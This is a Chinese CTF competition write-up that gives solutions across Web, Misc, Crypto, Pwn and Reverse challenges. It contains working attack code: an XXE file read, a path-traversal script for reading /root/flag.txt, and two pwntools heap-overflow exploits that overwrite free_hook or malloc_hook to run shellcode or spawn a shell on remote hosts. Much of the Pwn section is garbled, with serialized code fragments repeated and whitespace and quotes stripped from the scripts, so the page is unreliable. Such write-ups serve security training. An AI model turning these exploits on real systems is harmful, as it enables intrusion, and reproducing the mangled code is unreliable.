信息来源:互联网 发布时间:2024-04-12
一直打CTF一直爽~
恭喜Venom在本次比赛中获得第四名的好成绩!(团队收人,能熬的那种~)

Web

Game 解题思路

POST /score.php,score=15 就会有 flag:

$.ajax({url: 'score.php', type: 'POST', data: 'score=' + 15, success: function(data){ var data = data; $("#output").text(data); } })

who_are_you? 解题思路
&xxe;/proc/self/fd/2
file读不到,用php filter读flag在 index.php注释部分 show_me_your_image 解题思路import stringimport requests as reqimport
base64import urllib·z = {0: Y, 2: P, 4: y, 6: e, 8: v, B: z, D: N, F: t, H: x, J: U, L: X, N: F, P:
V, R: q, T: a, V: l, X: m, Z: S, b: 4, d: B, f: h, h: 5, j: c, l: M, n: 9, p: w, r: 1, t: 8, v: o, x:
i, z: K,+: u, /: A, 1: 0, 3: C, 5: T, 7: I, 9: k, A: b, C: J, G: 7, I: f, K: 6, M: Z, O: 2, Q: +, S:
d, U: 3, W: R, Y: W, a: L, c: r, e: g, g: n, i: E, k: j, m: G, o: H, q: Q, s: p, u: s, w: O, y: D, E:
\\}b64table = string.maketrans( .join(z.keys()), .join([z[k] for k in z.keys()]))b64table2 = string.maketrans(
.join([z[k] for k in z.keys()]), .join(z.keys()))URL = http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}
defget(pl): pl = base64.b64encode(pl)print"[+] Normal Base64 :", pl pl = pl.translate(b64table2)
print"[+] Encode Base64 :", pl pl = urllib.quote(pl) res = req.get(URL.format(pl)) print(res.content)
deftest(pl): pl = pl.translate(b64table) pl = base64.b64decode(pl)print plif __name__ == __main__
: get("../../../../../../proc/self/cwd/templates/upload.html") get("../../../../../../root/flag.txt"
)
MISC

签到题 解题思路

dig txt gamectf.com
gamectf.com. 600 IN TXT "flag{welcome_TXT}"
24words 解题思路
CodeValues

dd if=24w.png of=1.zip skip=22838 bs=1
7z x 1.zip

解压出图片后转黑白,扫描二维码即得 flag:flag{24_word_m4n7ra}

七代目
解题思路:修复文件头 GIF8。po叔说有的帧有问题,一帧一帧 save 后查看,在 7/66 帧找到 flag:
亚萨西 解题思路:下载之后爆破 zip 密码,爆破出来为 loli。解压之后把图片拖到 16 进制编辑器,在尾部发现 Ook 编码,解码就行了。flag{f71d6bca-3210-4a31-9feb-1768a65a33db}
CryptSM4解题思路from pysm4 import encrypt, decryptkey=[13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56,
214, 192, 194, 98, 104]c=[46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240
, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224
, 9, 204, 154, 122, 206, 43, 97, 59]key=.join(map(chr,key)).encode(hex)c=.join(map(chr,c)).encode(hex
)print(key,c)flag=for i in range(3): flag+=(hex(decrypt(int(c[i*32:i*32+32],16), int(key,16)))[2:-1].decode(
hex))print(flag)dp解题思路from sympy import *from sympy.core.numbers import igcdexe=65537n=9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp=81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c=5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827
p = gcd(n, pow(2, e*dp, n) - 2)q = n // pd = long(igcdex(e, (p-1) * (q-1))[0]%n)print(hex(pow(c,d,n))[2:-1].decode(hex))
flag{c3009b61-f9ed-4b20-8855-edab53e89530}PWN>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print 
hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]">
one_string 解题思路edit过程中根据strlen更新长度,存在堆溢出而后程序有rwx段,更改free_hook到&shellcode即可from pwn import *context.log_level=
"debug"defadd(l,note):#p.sendline("1")global s#p.sendline(str(l))#p.send(note) s+="1\n"+str(l)+"\n"+note
defdelete(index):global s#p.sendline("2")#p.sendline(str(index)) s+="2\n"+str(index)+"\n"defedit(index,note)
:global s#p.sendline("3")#p.sendline(str(index))#p.send(note) s+="3\n"+str(index)+"\n"+note#p=process("./pwn")
p=remote("df0a72047d6c.gamectf.com",10001)p.sendlineafter("Please input you token:\n","icq95702d8b2edd7591a517869c3f12f"
)s=""add(0x34,"a"*0x34)add(0x34,"a"*0x34)add(0x34,"a\n")edit(0,"b"*0x34)edit(0,"c"*0x34+"\x71")delete(
1)add(0x34,"a"*0x34)add(0x34,"a"*0x34)add(0x38,"a"*0x38)delete(2)edit(3,p32(0x80EBA0c)+"\n")add(0x34,
"a"*0x34)add(0x34,p32(0xf0)+"\n")edit(5,p32(0xa0)+p32(0x080EB4F0)*15+p32(0x080EB4F0)+asm(shellcraft.cat(
"/flag"))+"\n")edit(0,p32(0x80eba58)+"\n")delete(5)#gdb.attach(p)p.sendline(s.encode("base64").replace(
"\n",""))p.interactive()>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print 
hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]">
two string>> \",\"1\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(size))"],[20,"\n","36:0"],[20," p.sendafter(\": \",note)"],[20,"\n","36:0"],[20,"def show(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"2\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20," p.recvuntil(\": \")"],[20,"\n","36:0"],[20," return p.recvuntil(\"\\n\").strip()"],[20,"\n","36:0"],[20,"def delete(index):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"3\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index))"],[20,"\n","36:0"],[20,"def strcat(index1,index2):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"4\")"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index1))"],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",str(index2))"],[20,"\n","36:0"],[20,"def fake(a):"],[20,"\n","36:0"],[20," p.sendlineafter(\">>> \",\"5\")"],[20,"\n","36:0"],[20," s=\"\""],[20,"\n","36:0"],[20," for i in a:"],[20,"\n","36:0"],[20," s+=str(i)+\" \""],[20,"\n","36:0"],[20," p.sendlineafter(\" : \",s[:-1])"],[20,"\n","36:0"],[20,"#p=process(\"./pwn\")"],[20,"\n","36:0"],[20,"p=remote(\"a32f094e35d7.gamectf.com\",20001)"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x400,\"a\"*0x3ff+\"\\n\")#1"],[20,"\n","36:0"],[20,"add(0x28,\"b\"*9+p64(0xb1)+\"\\n\")#2"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"add(0x400,\"kirin\\n\")#0"],[20,"\n","36:0"],[20,"add(0x18,\"kirin\\n\")#3"],[20,"\n","36:0"],[20,"add(0x80,\"kirin\\n\")"],[20,"\n","36:0"],[20,"delete(0)"],[20,"\n","36:0"],[20,"fake([1,2])"],[20,"\n","36:0"],[20,"delete(3)"],[20,"\n","36:0"],[20,"add(0x18,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"libc_addr=u64(show(4)+\"\\x00\\x00\")"],[20,"\n","36:0"],[20,"print 
hex(libc_addr)"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"bbbb\\n\")"],[20,"\n","36:0"],[20,"delete(4)"],[20,"\n","36:0"],[20,"delete(6)"],[20,"\n","36:0"],[20,"delete(5)"],[20,"\n","36:0"],[20,"hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,p64(hook-0x23)+\"\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"aaaa\\n\")"],[20,"\n","36:0"],[20,"add(0x68,\"\\x00\"*0x13+p64(libc_addr+0x7ffff7a10000-0x00007ffff7dd1b58+0xf2519)+\"\\n\")"],[20,"\n","36:0"],[20,"#gdb.attach(p)"],[20,"\n","36:0"],[20,"p.interactive()"],[20,"\n","36:0"]]" style="color: rgb(73, 73, 73); font-size: 18px; text-align: left;">解题思路
多个字符串strcat时长度判断存在逻辑错误可以绕过0x400的检测造成strcat时堆溢出而后利用堆溢构造堆重叠,leak libc并修改malloc hook即可改至one_target即可get shell:
from pwn import *context.log_level="debug"defadd(size,note): p.sendlineafter(">>> ","1") p.sendlineafter(
" : ",str(size)) p.sendafter(": ",note)defshow(index): p.sendlineafter(">>> ","2") p.sendlineafter(
" : ",str(index)) p.recvuntil(": ")return p.recvuntil("\n").strip()defdelete(index): p.sendlineafter(
">>> ","3") p.sendlineafter(" : ",str(index))defstrcat(index1,index2): p.sendlineafter(">>> ","4"
) p.sendlineafter(" : ",str(index1)) p.sendlineafter(" : ",str(index2))deffake(a): p.sendlineafter(
">>> ","5") s=""for i in a: s+=str(i)+" " p.sendlineafter(" : ",s[:-1])#p=process("./pwn")p=remote(
"a32f094e35d7.gamectf.com",20001)add(0x18,"kirin\n")#0add(0x400,"a"*0x3ff+"\n")#1add(0x28,"b"*9+p64(0xb1
)+"\n")#2delete(0)add(0x400,"kirin\n")#0add(0x18,"kirin\n")#3add(0x80,"kirin\n")delete(0)fake([1,2])delete(
3)add(0x18,"aaaa\n")libc_addr=u64(show(4)+"\x00\x00")print hex(libc_addr)add(0x68,"bbbb\n")add(0x68,"bbbb\n"
)delete(4)delete(6)delete(5)hook=libc_addr-0x00007ffff7dd1b58+ 0x7ffff7dd1af0add(0x68,p64(hook-0x23)+
"\n")add(0x68,p64(hook-0x23)+"\n")add(0x68,"aaaa\n")add(0x68,"\x00"*0x13+p64(libc_addr+0x7ffff7a10000
-0x00007ffff7dd1b58+0xf2519)+"\n")#gdb.attach(p)p.interactive()Reversesrc_leak解题思路deffunc2(s): k=0
for i in range(10000):if s==0:break k+=s%2 s=s/2return kdeffunc3(s):return s%2print func3(func2(
1))def func1(n,l,r):if l==r:return l mid=(l+r+1)/2if(n
func1(n,mid,r)def_func1(s):return func1(s,1,s)print _func1(10)defNEXTM(n,m):if(m*m<=n):return m+1else
:return0defNEXTN(n,m):return (n%m!=0)*ndefTEST(n,m):if(n==0):return0if(m==0):return1return TEST(NEXTN(n,m),NEXTM(n,m))
deffunc4(n):return TEST(n,2)z=[963,4396,6666,1999,3141]for j in z:for i in range(1,100000000):if(_func1(i)==j
and func3(func2(i))==1):print ibreakkkk=0+1for i in range(3,10001): kkk+=func4(i)print kkkflag{927369
-19324816-44435556-3996001-9865881-1229}直接拿python 实现一遍 然后爆破flat解题思路key1 =[0x4A, 0x32, 0x32, 0x36, 0x31,
0x43, 0x36, 0x33, 0x2D, 0x33, 0x49, 0x32, 0x49, 0x2D, 0x45, 0x47, 0x45, 0x34, 0x2D, 0x49, 0x42, 0x43, 0x43, 0x2D, 0x49,
0x45, 0x34, 0x31, 0x41, 0x35, 0x49, 0x35, 0x46, 0x34, 0x48, 0x42]len11=42head="flag{"weiba="}"
num="0123456789"chrss="abcdefghijklmnopqrstuvwxyz"xiahu=[13,18,23,28]s=bytearray(36*:)for i in range(len(key1)):
if(key1[i]==0x2d): s[i]=0x2d for f in chrss: if ord(f)-0x30==key1[i]: s[i]=ord(f)
for f in num: if ord(f)+17==key1[i]: s[i]=ord(f)print s#flag{9bbfa2fc-c8b8-464d-8122-84da0e8e5d71}
check1/2/3/4 表明字符串长度、头、尾、下划线的位置;check5 判断长度,对每个字符处理,然后对照表。因为格式是 uuid,所以就变成了一个解了。
招新小广告ChaMd5 ctf组 长期招新尤其是crypto+reverse+pwn+合约的大佬欢迎联系admin@chamd5.org

